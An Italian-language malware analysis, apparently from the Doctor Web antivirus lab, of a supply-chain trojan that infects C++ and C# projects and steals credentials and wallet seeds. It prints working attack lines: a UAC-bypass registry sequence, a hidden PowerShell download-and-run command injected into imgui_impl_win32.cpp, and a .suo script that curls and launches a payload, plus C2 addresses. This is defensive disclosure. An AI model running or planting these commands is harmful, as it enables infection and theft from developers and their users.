L'obiettivo sono gli sviluppatori. Un nuovo trojan attacca le catene di fornitura e causa danni combinati ai PC infetti

Notizie "calde" | Tutte le notizie | Sui virus

Gli specialisti del laboratorio antivirus hanno analizzato un nuovo programma trojan. È una minaccia di tipo supply chain attack, cioè attacco alle catene di fornitura. Un tratto distintivo di questo malware è il suo focus sui progetti creati nel linguaggio di programmazione C++ e C#. Un'altra caratteristica è la sua elevata pericolosità. Il trojan unisce in sé diversi fattori distruttivi svolgendo contemporaneamente più funzioni: quelle di stealer, clipper, backdoor, cryptominer e fonte di infezione di file.

I primi casi di diffusione del trojan sono stati registrati nell'ultimo trimestre del 2025, da allora in poi esso viene costantemente modificato dai relativi sviluppatori. Viene distribuito principalmente su internet tramite file infetti .exe e python. Il processo di infezione è a più fasi, di seguito analizziamo lo svolgimento di ciascuna fase e i rispettivi obiettivi.

Fase 1. Trojan.DownLoader49.35384

Gli specialisti Doctor Web hanno rilevato numerose applicazioni legittime infette con una struttura simile. Un oggetto globale è aggiunto al file eseguibile originale, e l'esecuzione dell'applicazione trojanizzata inizia con l'ottenimento dell'accesso alle API di sistema tramite il metodo PEB walking. Quindi la funzione standard initterm scorre la tabella dei puntatori a funzione e li inizializza, dove una di tali funzioni è malevola e lancia il comando PowerShell. In alcune versioni del trojan questo payload è conservato in forma crittografata.

Avvio tramite initterm

Il comando PowerShell scarica ed esegue il file malevolo Trojan.DownLoader49.35687, il che significa che viene lanciata la seconda fase.

Comando PowerShell malevolo

In aggiunta ai file eseguibili, sono stati rilevati file in linguaggio Python (Python.Downloader.255). In questi ultimi il codice malevolo era cifrato tramite il meccanismo di crittografia simmetrica Fernet. È celato tramite un semplice offuscamento — una sequenza di spazi nella prima riga. Anche in questo caso l'esecuzione avviene a più fasi.

File Python malevoli

Fase 2. Trojan.DownLoader49.35687

In questa fase il trojan Trojan.DownLoader49.35687 esegue il controllo della propria esecuzione in sandbox. Oltre a ciò, crea un oggetto di sincronizzazione mutex con il nome Global\PFNMX(valore fisso). Esempio di un simile oggetto: \Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008. In questo modo il trojan controlla se sul computer è già in esecuzione un'altra copia.

Durante la seconda fase, il trojan cerca di ottenere gli indirizzi del server C2 utilizzando i repository pubblici GitHub e della piattaforma di gioco Steam. Su di essi i malintenzionati lasciano domini che il trojan legge e utilizza come gli URL per scaricare la terza fase — il trojan BackDoor.Siggen2.5906.

Gli account Steam creati dai malintenzionati contengono un nome di dominio in chiaro.

Account Steam con un dominio C2

Su GitHub i malintenzionati hanno salvato un indirizzo cifrato di un dominio C2 sotto forma di un file raw: raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine. Il trojan scarica questo file e lo decodifica prima tramite Base64, e quindi tramite l'operazione XOR con la chiave ZwFlushKey.

Domini crittografati

Dopo aver scaricato la fase successiva, Trojan.DownLoader49.35687 la incorpora nel processo di uno dei 41 file eseguibili previamente specificati da C:\Windows\System32.

Il trojan aggiunge l'indirizzo del dominio C2 a cui ha potuto stabilire una connessione alle stringhe trascritte nel suo codice sorgente e lo passa alla fase successiva tramite il named pipe pipe\VccFramework.

Fase 3. BackDoor.Siggen2.5906

La principale attività malevola si verifica in questa fase. BackDoor.Siggen2.5906 crea un oggetto di sincronizzazione mutex con un nome fisso di tipo Global\PFNX_Side(valore fisso). Quindi, attraverso il canale precedentemente creato, il trojan ottiene i dati dalla seconda fase, dai quali estrae gli identificatori del trojan e il dominio C2 con cui BackDoor.Siggen2.5906 comunicherà.

Per guadagnare persistenza nel sistema, il trojan scarica il file "bungee.boo", che svolge le funzioni di fase 2, ovvero Trojan.DownLoader49.35687, e sostituisce con quest'ultimo i file DLL:

  • "profapi.dll" dell'applicazione Discord,
  • "domain_actions.dll" nella cartella "Domain Actions" e "well_known_domains.dll" nella cartella "Well Known Domains" dell'applicazione Microsoft Edge,
  • "C:\Windows\omadmapi.dll".

Inoltre, BackDoor.Siggen2.5906 può alterare il registro di sistema di Windows in modo tale che all'apertura dei file compressi tramite WinRar.exe venga eseguito il codice malevolo.

Per le azioni con i permessi amministratore, il trojan utilizza una tecnica di aggiramento dell'UAC. Il malware genera un file .vbs con un nome composto da cifre casuali, in cui lascia il comando per l'esecuzione con i permessi amministratore. Quindi tramite cmd.exe vengono avviati i comandi:

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe

In seguito, il trojan svolge 5 funzioni malevole: quelle di stealer, clipper, backdoor, cryptominer e fonte di infezione di file.

Stealer

Il Trojan è in grado di rubare varie informazioni:

  • i tocken Discord, che consentono di accedere agli account altrui senza inserire il login/la password;
  • le password e i cookie dai browser Chrome, Edge, Opera, Brave, Yandex ecc. Oltre alle solite tecniche di estrazione dei dati, esso può utilizzare il file CCCWF.tmp (Trojan.PWS.Siggen5.33623). Si incorpora nel browser, e quindi legge le password e le salva in file di testo;
  • le cartelle di Telegram Desktop;
  • le cartelle del portafoglio crittografico Exodus.

Oltre a rubare le cartelle Exodus, il trojan esegue la modificazione del portafoglio crittografico. Per fare questo, esso trova il file app.asar e lo sostituisce con una copia scaricata dall'URL balista[.]lol/Stb/PokerFace/RTApp[.]txt tramite curl. Nella versione furtivamente sostituita in index.js (Trojan.Siggen32.44702) si trova la funzione unlock(), la quale all'esecuzione invia le frasi mnemoniche del portafoglio crypto al server dei malintenzionati.

File index.js furtivamente sostituito

Clipper

È una funzione particolarmente pericolosa del trojan. Il malware monitora costantemente gli appunti dell'utente: cerca i dati di carte bancarie e li invia al server dei malintenzionati. Inoltre, il programma malevolo sostituisce gli indirizzi di portafogli crypto con quelli fraudolenti, i quali ottiene dal server C2.

Backdoor

Le funzionalità del trojan consentono ai malintenzionati di gestire il PC infetto in remoto mediante i comandi:

excscarica un file da un url tramite curl ed eseguilo
RVRSavvia un Reverse Proxy
RUNCMDavvia un comando tramite cmd
GETFILEcarica il contenuto di un determinato file sul server di comando e controllo
LISTDIRinvia la lista dei file da una determinata directory del computer al server di comando e controllo
TROLLesegui il comando per il trolling dell'utente, esistono le opzioni earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer ecc.

Cryptominer

Tramite curl, il trojan scarica dal server e avvia il file https://files[.]catbox[.]moe/lvh9j3[.]bin — Trojan.Packed2.50953. La sua struttura e le sue azioni sono simili a quelle della fase 2, ma, invece di BackDoor.Siggen2.5906, esso scarica e incorpora Trojan.BtcMine.3956. Questo cryptominer si avvia solo dopo un determinato periodo di inattività dell'utente. Il malware utilizza gli strumenti XMRig, T-Rex e TeamRedMiner a codice sorgente aperto.

Infezione di file

Il principale tratto distintivo di questo trojan sono l'infezione di file e l'ulteriore propagazione autonoma. La lista dei file che vengono infettati:

  • imgui_impl_win32.cpp,
  • .suo,
  • .exe,
  • winnetwk.h (Windows SDK),
  • .vcxproj e .csproj.

Per determinare i percorsi dei file che possono essere infettati, il trojan scansiona sequenzialmente i dischi e avvia il comando. Esempio per il disco A://

dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290.

I malintenzionati contano su quello che gli sviluppatori pubblicheranno i loro progetti con codice malevolo in accesso aperto. Altri sviluppatori, che assembleranno, compileranno o modificheranno il progetto, infetteranno automaticamente i propri computer a causa dei file .suo, .vcxproj e .csproj, mentre gli utenti comuni potranno avviare i file eseguibili infetti, creati tramite gli strumenti di sviluppo compromessi.

File imgui_impl_win32.cpp. Trojan.Loader.3129

Il file imgui_impl_win32.cpp è parte della popolare libreria Dear ImGui, responsabile dell'interfaccia grafica del linguaggio di programmazione C++. Il trojan incorpora nel file due stringhe: la prima contiene il payload, la seconda lo lancia.

Stringa di codice con il payload

Stringa di codice con l'avvio del payload

Il risultato è il comando


start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 

Pertanto, la libreria viene infettata, e qualsiasi applicazione in C++ creata dall'utente conterrà in sé codice malevolo. Con il trasferimento o caricamento delle simili applicazioni, l'infezione si diffonderà ulteriormente.

File .suo. Trojan.Loader.3138

È un'estensione dei file dell'ambiente di sviluppo Microsoft Visual Studio. In questi file sono conservate le impostazioni dell'utente per determinati progetti. Il trojan sostituisce il file originale con quello infetto, ottenuto dal C2.

File infetto

Come risultato, all'apertura del progetto in Visual Studio viene avviato il codice malevolo:


javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();

File winnetwk.h. Trojan.Loader.3184

Windows SDK è un set di strumenti ufficiale di Microsoft che consente di creare applicazioni per SO Windows.

Tramite il registro, il trojan trova la cartella in cui è installato Windows SDK. In questa cartella avviene la ricerca del file winnetwk.h, responsabile dell'interazione con le risorse di rete. Quindi ad esso viene aggiunto il codice malevolo.

File winnetwk.h infetto

A seguito di questo, tutti i programmi creati con l'utilizzo di winnetwk.h avranno il codice malevolo, il quale avvia la fase 2.

File .exe

Il trojan cerca i file .exe adatti e incorpora in essi le funzioni di inizializzazione delle API e di avvio di initterm. Quindi il file inizia a funzionare come Trojan.DownLoader49.35384, ovvero la fase 1.

File .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) e .csproj (Trojan.Loader.3126)

Sono file dei progetti Visual Studio nei linguaggi di programmazione C++ e C#. Ad essi viene aggiunto il comando PreBuildEvent, che viene eseguito prima di ciascun assemblaggio di un progetto. Le prime versioni del trojan aggiungevano un codice simile alla fase 1.

Una prima versione di codice

Nelle nuove versioni il codice è diventato più complesso, è comparso un ulteriore offuscamento.

Una nuova versione di codice

Una delle fasi di esecuzione di Trojan.Loader.3128

Come risultato dell'esecuzione del comando malevolo, viene scritto un file .vbs malevolo, il quale, a sua volta, avvia PowerShell payload. Il trojan effettua una richiesta agli indirizzi URL:

  • youtu.be/akoxddx6lgc,
  • steamcommunity.com/profiles/76561198737324192.

Su questi indirizzi è conservato un altro indirizzo URL crittografato tramite base64.

Account YouTube con un indirizzo URL crittografato

Dopo la decodifica, il trojan ottiene un dominio C2 a cui esso si connette per ricevere il payload, che è simile alla fase 2.

La descrizione del funzionamento del trojan ci permette di concludere che esso rappresenta un pericolo elevato a causa della combinazione di diverse funzioni malevole. Per evitare l'infezione del proprio computer e l'ulteriore diffusione del trojan, vi consigliamo di aggiornare regolarmente i database antivirus e controllare tutti i file scaricati da internet. Gli utenti dell'antivirus Dr.Web Security Space e Dr.Web Desktop Security Suite possono essere tranquilli, in quanto il trojan viene rilevato ed eliminato in modo affidabile dagli antivirus Dr.Web. I file di tipo .vcxproj, .csproj e imgui vengono curati, da essi viene eliminato il codice malevolo.

0
Ultime notizie Tutte le notizie